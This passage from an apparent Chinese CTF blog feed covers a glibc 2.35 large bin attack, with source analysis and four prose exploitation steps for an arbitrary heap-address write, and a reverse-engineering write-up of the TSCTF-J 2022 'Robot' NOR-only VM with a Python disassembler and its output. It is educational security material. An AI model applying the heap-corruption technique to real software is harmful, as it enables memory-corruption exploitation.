                fwd->bk_nextsize = victim;
                victim->bk_nextsize->fd_nextsize = victim;
            }
            bck = fwd->bk;
            if (bck->fd != fwd)
                malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
        }
    }
    else
        victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

注意到为了使同一large bin中的chunk有序,插入chunk时对大小进行了判断。而当(unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))即在要插入的chunk比large bin中已有的chunk小的时候,进行了没有检查的赋值操作fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;,只要更改victim->bk_nextsize,而victim->bk_nextsize在前面被赋值为fwd->fd->bk_nextsize。因此只要更改fwd->fd->bk_nextsizeaddr-0x20,就可以在addr处写入victim的堆地址。

利用

  1. 申请处于同一large bin范围的一大一小两个堆块chunk1, chunk2(两个chunk间需要分隔,与top chunk也要分隔)

  2. 释放chunk1后申请比其更大的堆块使其从unsorted bin进入large bin

  3. 更改chunk1->bk_nextsize为addr-0x20

  4. 释放chunk2后申请比其更大的堆块使其从unsorted bin进入large bin,完成攻击

]]> glibc 2.35下的Large Bin Attack源码分析 TSCTF-J 2022 Reverse Robot赛题复现 https://zqy.ink/2023/02/13/TSCTF-J_2022_Robot/ 2023-02-13T04:52:26.000Z 2025-11-14T08:20:36.879Z 前言

题目名叫🤖,因为害怕奇奇怪怪的编码错误,我暂且叫它Robot

HNCTF有相似的题目,名叫WEIRD VM

半年前拿到这题我连看都不敢看一眼,现在回想起来再看花10小时做出来了,可能这就是进步吧(胡言乱语((

分析

程序没有加混淆,主函数一目了然是一个简单到过头的虚拟机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned __int16 *v3; // rax
  unsigned __int16 *v4; // rbx
  int result; // eax
  __int64 v6; // rdx
  __int64 v7; // r8
  __int64 src1; // rcx
  __int64 src0; // rax
  __int64 dst; // r9
  unsigned __int16 v11; // dx

  v3 = (unsigned __int16 *)VirtualAlloc(0i64, 0x20000ui64, 0x1000u, 4u);
  vm = (__int64)v3;
  v4 = v3;
  if ( v3 )
  {
    memmove(v3 + 300, &code, 0x4088ui64);
    *v4 = 300;
    do
    {
      if ( v4[4] == 1 )
      {
        v6 = v4[3];
        v4[4] = 0;
        printch((int)&unk_7FF6216D1740, v6);
        v4 = (unsigned __int16 *)vm;
      }
      if ( v4[6] == 1 )
      {
        v4[6] = 0;
        ((void (__fastcall *)(void *, unsigned __int16 *))getch)(&unk_7FF6216D1740, v4 + 5);
        v4 = (unsigned __int16 *)vm;
      }
      v7 = *v4;
      src1 = v4[v7 + 1];
      src0 = v4[v7];
      dst = v4[v7 + 2];
      *v4 = v7 + 3;
      v11 = ~(v4[src0] | v4[src1]);
      v4[dst] = v11;
      v4[1] = __ROL2__(v11, 1);
    }
    while ( *v4 != 0xFFFF );
    VirtualFree(v4, 0i64, 0x8000u);
    result = 0;
    vm = 0i64;
  }
  else
  {
    printch((int)"Init ?? failed\n");
    return 0;
  }
  return result;
}

显然这个虚拟机字长为2字节,v4[0]是pc,v[3],v[4]用于输出,v[5],v[6]用于输入。v4[300]开始存储指令。比较特别的是,这个虚拟机只能进行nor运算,指令长度为3个word,前两个是源操作数的地址,第三个是目的操作数的地址。特殊地,v4[1]的位置存储了nor运算结果循环左移1位的结果。

为了更好了解这个虚拟机是怎么工作的,我们可以单步调试观察。观察可得v4[7]是一个用于暂存数据的寄存器。在存取数据时,src0==src1;数据从一个内存地址转移到另一个内存地址时,常用v4[7]作为中转,即src->v4[7]->dst,这样相当于进行了两次取反运算,即dst的值等于src的值。程序将立即数夹杂在指令中,并在指令中进行跳转操作,跳过中间夹杂的立即数,并取走立即数。循环左移则用于对输入内容的加密。

虽然指令已经很明确了(毕竟只有nor),但是如果这样将code直接翻译过来,那工作量会大幅上升。我们可以根据虚拟机通过nor实现复杂指令的特点,识别复杂指令。将code dump下来后,编写反汇编器如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
from pwn import *
#context.log_level='warning'
ip = 300
reg=0
originalCode=b'\x00'*600+open('code.bin','rb').read()
CodeList=[]
assert(len(originalCode)%2==0)
for i in range(len(originalCode)//2):
    CodeList.append(u16(originalCode[i*2:i*2+2]))

def rol(num):
    assert(0<=num<=0xffff)
    return ((num<<1)&0xffff)+(num>>15)

def rol_back(num):
    assert(0<=num<=0xffff)
    return (num>>1)+(num%2)*(1<<15)

def rev(num):
    return (~num)&0xffff

def jmp(addr):
    global ip
    info(f'ip={hex(ip)}:set ip to {hex(addr)}')
    if addr-ip>30 or addr-ip<0:
        input(f"error at ip={hex(ip)}")
    ip=addr

def pattern_nor_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if dst!=7:
        return -1
    return [src0,src1]

def nor_reg_handler(result):
    reg=0xffffffff
    return f'reg=~(*({hex(result[0])})|*({hex(result[1])}))'

def pattern_not(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1:
        return -1
    return [src0,dst]

def not_handler(result):
    return f'*({hex(result[1])})=~(*({hex(result[0])}))'

def pattern_load_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1 or dst!=7:
        return -1
    return src0

def load_reg_handler(result):
    reg=rev(CodeList[result])
    return f'reg=~(*({hex(result)}))'

def pattern_save_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1 or src0!=7:
        return -1
    return dst

def save_reg_handler(result):
    global reg
    global ip
    if result==0:
        jmp(reg)
        info('regjump')
        ip-=3
        return
    return f'*({hex(result)})=~reg'

def pattern_jmp(code):
    addr=pattern_load_reg(code)
    if addr==-1:
        return -1
    code=code[3:]
    src0,src1,dst=code[0],code[1],code[2]
    if src0==src1==7 and dst==0:
        return addr
    return -1

def jmp_handler(result):
    jmp(CodeList[result])

def pattern_load_imm(code):
    addr=pattern_jmp(code)
    if addr==-1:
        return -1
    if not (CodeList[addr]-addr==2 and pattern_load_reg(code[8:])==addr+1):
        return -1
    return code[7]

def load_imm_handler(result):
    global reg
    reg=result
    return f'reg={hex(result)}'

def pattern_put(code):
    chraddr=pattern_load_reg(code)
    if chraddr==-1:
        return -1
    code=code[3:]
    pos=pattern_save_reg(code)
    if pos!=3:
        return -1
    code=code[3:]
    imm=pattern_load_imm(code)
    if imm!=1:
        return -1
    code=code[11:]
    pos=pattern_save_reg(code)
    if pos!=4:
        return -1
    return chraddr

def put_handler(result):
    return f"putchar('{chr(CodeList[result])}')"

def pattern_get(code):
    imm=pattern_load_imm(code)
    if imm!=1:
        return -1
    code=code[11:]
    pos=pattern_save_reg(code)
    if pos!=6:
        return -1
    code=code[3:]
    pos=pattern_load_reg(code)
    if pos!=5:
        return -1
    code=code[3:]
    addr=pattern_save_reg(code)
    if addr==-1:
        return -1
    return addr

def get_handler(result):
    return f"*({hex(result)})=getchar()"

def pattern_load_mem(code):
    addrsrc=pattern_load_reg(code)
    code=code[3:]
    addrdst=pattern_save_reg(code)
    if addrsrc==-1 or addrdst==-1:
        return -1
    return [addrsrc,addrdst]

def load_mem_handler(result):
    return f"*({hex(result[1])})={f'*({hex(result[0])})' if result[0]!=7 else 'reg'}"

def pattern_rol(code):
    result=pattern_load_mem(code)
    if result==-1:
        return -1
    if result[0]!=result[1]:
        return -1
    addr=result[0]
    code=code[6:]
    result=pattern_load_mem(code)
    if result==-1:
        return -1
    if result[1]!=addr or result[0]!=1:
        return -1
    return addr

def pattern_rols(code):
    global ip
    i=1
    addr0=pattern_rol(code)
    if addr0==-1:
        return -1
    ip+=12
    while True:
        addr1=pattern_rol(CodeList[ip:])
        if addr1==-1 or addr1!=addr0:
            break
        i+=1
        ip+=12
        addr0=addr1
    return [addr0, i%16]

def rols_handler(result):
    return f'rol(*({hex(result[0])}), {str(result[1])})'

patterns=[[pattern_rols,rols_handler,0],[pattern_get,get_handler,20],[pattern_put,put_handler,20],[pattern_load_imm,load_imm_handler,11],[pattern_jmp,jmp_handler,0],[pattern_load_mem,load_mem_handler,6],[pattern_load_reg,load_reg_handler,3],[pattern_save_reg,save_reg_handler,3],[pattern_not,not_handler,3],[pattern_nor_reg,nor_reg_handler,3]]

def disassemble():
    global ip
    ip=300
    while ip<len(CodeList):
        flag=0
        for pattern in patterns:
            result=pattern[0](CodeList[ip:])
            if result!=-1:
                dis=pattern[1](result)
                #print(pattern)
                if dis!=None:
                    print(f'{hex(ip)}:{dis}')
                ip+=pattern[2]
                flag=1
                break
        if flag==0:
            input(f'unknown instruction at ip={hex(ip)}')

为了避免程序到处乱跳,或者出现指令错位的情况,可以在jmp函数中插入调试信息跟踪程序跳转。观察结果发现程序没有远跳转,也无指令错位,这样我们就可以放心看输出结果了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
0x12c:putchar('P')
0x140:putchar('l')
0x154:putchar('e')
0x168:putchar('a')
0x17c:putchar('s')
0x190:putchar('e')
0x1a4:putchar(' ')
0x1b8:putchar('i')
0x1cc:putchar('n')
0x1e0:putchar('p')
0x1f4:putchar('u')
0x208:putchar('t')
0x21c:putchar(' ')
0x230:putchar('y')
0x244:putchar('o')
0x258:putchar('u')
0x26c:putchar('r')
0x280:putchar(' ')
0x294:putchar('f')
0x2a8:putchar('l')
0x2bc:putchar('a')
0x2d0:putchar('g')
0x2e4:putchar(':')
0x2f8:reg=0x307
[*] ip=0x303:set ip to 0x307
[*] regjump
0x307:*(0x2137)=getchar()
0x31b:*(0x2138)=getchar()
0x32f:*(0x2139)=getchar()
0x343:*(0x213a)=getchar()
0x357:*(0x213b)=getchar()
0x36b:*(0x213c)=getchar()
0x37f:*(0x213d)=getchar()
0x393:*(0x213e)=getchar()
0x3a7:*(0x213f)=getchar()
0x3bb:*(0x2140)=getchar()
0x3cf:*(0x2141)=getchar()
0x3e3:*(0x2142)=getchar()
0x3f7:*(0x2143)=getchar()
0x40b:*(0x2144)=getchar()
0x41f:*(0x2145)=getchar()
0x433:*(0x2146)=getchar()
0x447:*(0x2147)=getchar()
0x45b:*(0x2148)=getchar()
0x46f:*(0x2149)=getchar()
0x483:*(0x214a)=getchar()
0x497:*(0x214b)=getchar()
0x4ab:*(0x214c)=getchar()
0x4bf:*(0x214d)=getchar()
0x4d3:*(0x214e)=getchar()
0x4e7:*(0x214f)=getchar()
0x4fb:*(0x2150)=getchar()
0x50f:*(0x2151)=getchar()
0x523:*(0x2152)=getchar()
0x537:*(0x2153)=getchar()
0x54b:*(0x2154)=getchar()
0x55f:*(0x2155)=getchar()
0x573:*(0x2156)=getchar()
0x587:*(0x2157)=getchar()
0x59b:*(0x2158)=getchar()
0x5af:*(0x2159)=getchar()
0x5c3:*(0x202f)=*(0x2137)
0x67d:rol(*(0x202f), 15)
[*] ip=0x67d:set ip to 0x686
0x686:*(0x684)=~(*(0x202f))
0x689:*(0x685)=~(*(0x212c))
[*] ip=0x68c:set ip to 0x695
0x695:*(0x693)=~(*(0x202f))
0x698:*(0x694)=~(*(0x685))
0x69b:reg=~(*(0x693)|*(0x694))
0x69e:*(0x685)=reg
[*] ip=0x6a4:set ip to 0x6ad
0x6ad:*(0x6ab)=~(*(0x212c))
0x6b0:*(0x6ac)=~(*(0x684))
0x6b3:reg=~(*(0x6ab)|*(0x6ac))
0x6b6:*(0x684)=reg
0x6bc:reg=~(*(0x684)|*(0x685))
0x6bf:*(0x202f)=~reg
0x6c2:reg=~(*(0x202f)|*(0x306))
0x6c5:*(0x306)=~reg
0x6c8:*(0x202f)=*(0x2138)
0x782:rol(*(0x202f), 15)
[*] ip=0x782:set ip to 0x78b
0x78b:*(0x789)=~(*(0x202f))
0x78e:*(0x78a)=~(*(0x212b))
[*] ip=0x791:set ip to 0x79a
0x79a:*(0x798)=~(*(0x202f))
0x79d:*(0x799)=~(*(0x78a))
0x7a0:reg=~(*(0x798)|*(0x799))
0x7a3:*(0x78a)=reg
[*] ip=0x7a9:set ip to 0x7b2
0x7b2:*(0x7b0)=~(*(0x212b))
0x7b5:*(0x7b1)=~(*(0x789))
0x7b8:reg=~(*(0x7b0)|*(0x7b1))
0x7bb:*(0x789)=reg
0x7c1:reg=~(*(0x789)|*(0x78a))
0x7c4:*(0x202f)=~reg
0x7c7:reg=~(*(0x202f)|*(0x306))
0x7ca:*(0x306)=~reg
0x7cd:*(0x202f)=*(0x2139)
0x887:rol(*(0x202f), 15)
[*] ip=0x887:set ip to 0x890
0x890:*(0x88e)=~(*(0x202f))
0x893:*(0x88f)=~(*(0x2123))
[*] ip=0x896:set ip to 0x89f
0x89f:*(0x89d)=~(*(0x202f))
0x8a2:*(0x89e)=~(*(0x88f))
0x8a5:reg=~(*(0x89d)|*(0x89e))
0x8a8:*(0x88f)=reg
[*] ip=0x8ae:set ip to 0x8b7
0x8b7:*(0x8b5)=~(*(0x2123))
0x8ba:*(0x8b6)=~(*(0x88e))
0x8bd:reg=~(*(0x8b5)|*(0x8b6))
0x8c0:*(0x88e)=reg
0x8c6:reg=~(*(0x88e)|*(0x88f))
0x8c9:*(0x202f)=~reg
0x8cc:reg=~(*(0x202f)|*(0x306))
0x8cf:*(0x306)=~reg
0x8d2:*(0x202f)=*(0x213a)
0x98c:rol(*(0x202f), 15)
[*] ip=0x98c:set ip to 0x995
0x995:*(0x993)=~(*(0x202f))
0x998:*(0x994)=~(*(0x212c))
[*] ip=0x99b:set ip to 0x9a4
0x9a4:*(0x9a2)=~(*(0x202f))
0x9a7:*(0x9a3)=~(*(0x994))
0x9aa:reg=~(*(0x9a2)|*(0x9a3))
0x9ad:*(0x994)=reg
[*] ip=0x9b3:set ip to 0x9bc
0x9bc:*(0x9ba)=~(*(0x212c))
0x9bf:*(0x9bb)=~(*(0x993))
0x9c2:reg=~(*(0x9ba)|*(0x9bb))
0x9c5:*(0x993)=reg
0x9cb:reg=~(*(0x993)|*(0x994))
0x9ce:*(0x202f)=~reg
0x9d1:reg=~(*(0x202f)|*(0x306))
0x9d4:*(0x306)=~reg
0x9d7:*(0x202f)=*(0x213b)
0xa91:rol(*(0x202f), 15)
[*] ip=0xa91:set ip to 0xa9a
0xa9a:*(0xa98)=~(*(0x202f))
0xa9d:*(0xa99)=~(*(0x2125))
[*] ip=0xaa0:set ip to 0xaa9
0xaa9:*(0xaa7)=~(*(0x202f))
0xaac:*(0xaa8)=~(*(0xa99))
0xaaf:reg=~(*(0xaa7)|*(0xaa8))
0xab2:*(0xa99)=reg
[*] ip=0xab8:set ip to 0xac1
0xac1:*(0xabf)=~(*(0x2125))
0xac4:*(0xac0)=~(*(0xa98))
0xac7:reg=~(*(0xabf)|*(0xac0))
0xaca:*(0xa98)=reg
0xad0:reg=~(*(0xa98)|*(0xa99))
0xad3:*(0x202f)=~reg
0xad6:reg=~(*(0x202f)|*(0x306))
0xad9:*(0x306)=~reg
0xadc:*(0x202f)=*(0x213c)
0xb96:rol(*(0x202f), 15)
[*] ip=0xb96:set ip to 0xb9f
0xb9f:*(0xb9d)=~(*(0x202f))
0xba2:*(0xb9e)=~(*(0x211b))
[*] ip=0xba5:set ip to 0xbae
0xbae:*(0xbac)=~(*(0x202f))
0xbb1:*(0xbad)=~(*(0xb9e))
0xbb4:reg=~(*(0xbac)|*(0xbad))
0xbb7:*(0xb9e)=reg
[*] ip=0xbbd:set ip to 0xbc6
0xbc6:*(0xbc4)=~(*(0x211b))
0xbc9:*(0xbc5)=~(*(0xb9d))
0xbcc:reg=~(*(0xbc4)|*(0xbc5))
0xbcf:*(0xb9d)=reg
0xbd5:reg=~(*(0xb9d)|*(0xb9e))
0xbd8:*(0x202f)=~reg
0xbdb:reg=~(*(0x202f)|*(0x306))
0xbde:*(0x306)=~reg
0xbe1:*(0x202f)=*(0x213d)
0xc9b:rol(*(0x202f), 15)
[*] ip=0xc9b:set ip to 0xca4
0xca4:*(0xca2)=~(*(0x202f))
0xca7:*(0xca3)=~(*(0x2127))
[*] ip=0xcaa:set ip to 0xcb3
0xcb3:*(0xcb1)=~(*(0x202f))
0xcb6:*(0xcb2)=~(*(0xca3))
0xcb9:reg=~(*(0xcb1)|*(0xcb2))
0xcbc:*(0xca3)=reg
[*] ip=0xcc2:set ip to 0xccb
0xccb:*(0xcc9)=~(*(0x2127))
0xcce:*(0xcca)=~(*(0xca2))
0xcd1:reg=~(*(0xcc9)|*(0xcca))
0xcd4:*(0xca2)=reg
0xcda:reg=~(*(0xca2)|*(0xca3))
0xcdd:*(0x202f)=~reg
0xce0:reg=~(*(0x202f)|*(0x306))
0xce3:*(0x306)=~reg
0xce6:*(0x202f)=*(0x213e)
0xda0:rol(*(0x202f), 15)
[*] ip=0xda0:set ip to 0xda9
0xda9:*(0xda7)=~(*(0x202f))
0xdac:*(0xda8)=~(*(0x2135))
[*] ip=0xdaf:set ip to 0xdb8
0xdb8:*(0xdb6)=~(*(0x202f))
0xdbb:*(0xdb7)=~(*(0xda8))
0xdbe:reg=~(*(0xdb6)|*(0xdb7))
0xdc1:*(0xda8)=reg
[*] ip=0xdc7:set ip to 0xdd0
0xdd0:*(0xdce)=~(*(0x2135))
0xdd3:*(0xdcf)=~(*(0xda7))
0xdd6:reg=~(*(0xdce)|*(0xdcf))
0xdd9:*(0xda7)=reg
0xddf:reg=~(*(0xda7)|*(0xda8))
0xde2:*(0x202f)=~reg
0xde5:reg=~(*(0x202f)|*(0x306))
0xde8:*(0x306)=~reg
0xdeb:*(0x202f)=*(0x213f)
0xea5:rol(*(0x202f), 15)
[*] ip=0xea5:set ip to 0xeae
0xeae:*(0xeac)=~(*(0x202f))
0xeb1:*(0xead)=~(*(0x212b))
[*] ip=0xeb4:set ip to 0xebd
0xebd:*(0xebb)=~(*(0x202f))
0xec0:*(0xebc)=~(*(0xead))
0xec3:reg=~(*(0xebb)|*(0xebc))
0xec6:*(0xead)=reg
[*] ip=0xecc:set ip to 0xed5
0xed5:*(0xed3)=~(*(0x212b))
0xed8:*(0xed4)=~(*(0xeac))
0xedb:reg=~(*(0xed3)|*(0xed4))
0xede:*(0xeac)=reg
0xee4:reg=~(*(0xeac)|*(0xead))
0xee7:*(0x202f)=~reg
0xeea:reg=~(*(0x202f)|*(0x306))
0xeed:*(0x306)=~reg
[*] ip=0xef0:set ip to 0xef9
0xef9:*(0xef7)=~(*(0x2140))
0xefc:*(0xef8)=~(*(0x2118))
[*] ip=0xeff:set ip to 0xf08
0xf08:*(0xf06)=~(*(0x2140))
0xf0b:*(0xf07)=~(*(0xef8))
0xf0e:reg=~(*(0xf06)|*(0xf07))
0xf11:*(0xef8)=reg
[*] ip=0xf17:set ip to 0xf20
0xf20:*(0xf1e)=~(*(0x2118))
0xf23:*(0xf1f)=~(*(0xef7))
0xf26:reg=~(*(0xf1e)|*(0xf1f))
0xf29:*(0xef7)=reg
0xf2f:reg=~(*(0xef7)|*(0xef8))
0xf32:*(0x202f)=~reg
[*] ip=0xf35:set ip to 0xf3e
0xf3e:*(0xf3c)=~(*(0x202f))
0xf41:*(0xf3d)=~(*(0x2133))
[*] ip=0xf44:set ip to 0xf4d
0xf4d:*(0xf4b)=~(*(0x202f))
0xf50:*(0xf4c)=~(*(0xf3d))
0xf53:reg=~(*(0xf4b)|*(0xf4c))
0xf56:*(0xf3d)=reg
[*] ip=0xf5c:set ip to 0xf65
0xf65:*(0xf63)=~(*(0x2133))
0xf68:*(0xf64)=~(*(0xf3c))
0xf6b:reg=~(*(0xf63)|*(0xf64))
0xf6e:*(0xf3c)=reg
0xf74:reg=~(*(0xf3c)|*(0xf3d))
0xf77:*(0x202f)=~reg
0xf7a:reg=~(*(0x202f)|*(0x306))
0xf7d:*(0x306)=~reg
[*] ip=0xf80:set ip to 0xf89
0xf89:*(0xf87)=~(*(0x2141))
0xf8c:*(0xf88)=~(*(0x2116))
[*] ip=0xf8f:set ip to 0xf98
0xf98:*(0xf96)=~(*(0x2141))
0xf9b:*(0xf97)=~(*(0xf88))
0xf9e:reg=~(*(0xf96)|*(0xf97))
0xfa1:*(0xf88)=reg
[*] ip=0xfa7:set ip to 0xfb0
0xfb0:*(0xfae)=~(*(0x2116))
0xfb3:*(0xfaf)=~(*(0xf87))
0xfb6:reg=~(*(0xfae)|*(0xfaf))
0xfb9:*(0xf87)=reg
0xfbf:reg=~(*(0xf87)|*(0xf88))
0xfc2:*(0x202f)=~reg
[*] ip=0xfc5:set ip to 0xfce
0xfce:*(0xfcc)=~(*(0x202f))
0xfd1:*(0xfcd)=~(*(0x211f))
[*] ip=0xfd4:set ip to 0xfdd
0xfdd:*(0xfdb)=~(*(0x202f))
0xfe0:*(0xfdc)=~(*(0xfcd))
0xfe3:reg=~(*(0xfdb)|*(0xfdc))
0xfe6:*(0xfcd)=reg
[*] ip=0xfec:set ip to 0xff5
0xff5:*(0xff3)=~(*(0x211f))
0xff8:*(0xff4)=~(*(0xfcc))
0xffb:reg=~(*(0xff3)|*(0xff4))
0xffe:*(0xfcc)=reg
0x1004:reg=~(*(0xfcc)|*(0xfcd))
0x1007:*(0x202f)=~reg
0x100a:reg=~(*(0x202f)|*(0x306))
0x100d:*(0x306)=~reg
0x1010:*(0x202f)=*(0x2142)
0x10ca:rol(*(0x202f), 15)
[*] ip=0x10ca:set ip to 0x10d3
0x10d3:*(0x10d1)=~(*(0x202f))
0x10d6:*(0x10d2)=~(*(0x2132))
[*] ip=0x10d9:set ip to 0x10e2
0x10e2:*(0x10e0)=~(*(0x202f))
0x10e5:*(0x10e1)=~(*(0x10d2))
0x10e8:reg=~(*(0x10e0)|*(0x10e1))
0x10eb:*(0x10d2)=reg
[*] ip=0x10f1:set ip to 0x10fa
0x10fa:*(0x10f8)=~(*(0x2132))
0x10fd:*(0x10f9)=~(*(0x10d1))
0x1100:reg=~(*(0x10f8)|*(0x10f9))
0x1103:*(0x10d1)=reg
0x1109:reg=~(*(0x10d1)|*(0x10d2))
0x110c:*(0x202f)=~reg
0x110f:reg=~(*(0x202f)|*(0x306))
0x1112:*(0x306)=~reg
0x1115:*(0x202f)=*(0x2143)
0x11cf:rol(*(0x202f), 15)
[*] ip=0x11cf:set ip to 0x11d8
0x11d8:*(0x11d6)=~(*(0x202f))
0x11db:*(0x11d7)=~(*(0x211d))
[*] ip=0x11de:set ip to 0x11e7
0x11e7:*(0x11e5)=~(*(0x202f))
0x11ea:*(0x11e6)=~(*(0x11d7))
0x11ed:reg=~(*(0x11e5)|*(0x11e6))
0x11f0:*(0x11d7)=reg
[*] ip=0x11f6:set ip to 0x11ff
0x11ff:*(0x11fd)=~(*(0x211d))
0x1202:*(0x11fe)=~(*(0x11d6))
0x1205:reg=~(*(0x11fd)|*(0x11fe))
0x1208:*(0x11d6)=reg
0x120e:reg=~(*(0x11d6)|*(0x11d7))
0x1211:*(0x202f)=~reg
0x1214:reg=~(*(0x202f)|*(0x306))
0x1217:*(0x306)=~reg
0x121a:*(0x202f)=*(0x2144)
0x12d4:rol(*(0x202f), 15)
[*] ip=0x12d4:set ip to 0x12dd
0x12dd:*(0x12db)=~(*(0x202f))
0x12e0:*(0x12dc)=~(*(0x2124))
[*] ip=0x12e3:set ip to 0x12ec
0x12ec:*(0x12ea)=~(*(0x202f))
0x12ef:*(0x12eb)=~(*(0x12dc))
0x12f2:reg=~(*(0x12ea)|*(0x12eb))
0x12f5:*(0x12dc)=reg
[*] ip=0x12fb:set ip to 0x1304
0x1304:*(0x1302)=~(*(0x2124))
0x1307:*(0x1303)=~(*(0x12db))
0x130a:reg=~(*(0x1302)|*(0x1303))
0x130d:*(0x12db)=reg
0x1313:reg=~(*(0x12db)|*(0x12dc))
0x1316:*(0x202f)=~reg
0x1319:reg=~(*(0x202f)|*(0x306))
0x131c:*(0x306)=~reg
0x131f:*(0x2145)=*(0x2145)
0x1325:*(0x202f)=*(0x1)
[*] ip=0x132b:set ip to 0x1334
0x1334:*(0x1332)=~(*(0x202f))
0x1337:*(0x1333)=~(*(0x2136))
[*] ip=0x133a:set ip to 0x1343
0x1343:*(0x1341)=~(*(0x202f))
0x1346:*(0x1342)=~(*(0x1333))
0x1349:reg=~(*(0x1341)|*(0x1342))
0x134c:*(0x1333)=reg
[*] ip=0x1352:set ip to 0x135b
0x135b:*(0x1359)=~(*(0x2136))
0x135e:*(0x135a)=~(*(0x1332))
0x1361:reg=~(*(0x1359)|*(0x135a))
0x1364:*(0x1332)=reg
0x136a:reg=~(*(0x1332)|*(0x1333))
0x136d:*(0x202f)=~reg
0x1370:reg=~(*(0x202f)|*(0x306))
0x1373:*(0x306)=~reg
0x1376:*(0x2146)=*(0x2146)
0x137c:*(0x202f)=*(0x1)
[*] ip=0x1382:set ip to 0x138b
0x138b:*(0x1389)=~(*(0x202f))
0x138e:*(0x138a)=~(*(0x2126))
[*] ip=0x1391:set ip to 0x139a
0x139a:*(0x1398)=~(*(0x202f))
0x139d:*(0x1399)=~(*(0x138a))
0x13a0:reg=~(*(0x1398)|*(0x1399))
0x13a3:*(0x138a)=reg
[*] ip=0x13a9:set ip to 0x13b2
0x13b2:*(0x13b0)=~(*(0x2126))
0x13b5:*(0x13b1)=~(*(0x1389))
0x13b8:reg=~(*(0x13b0)|*(0x13b1))
0x13bb:*(0x1389)=reg
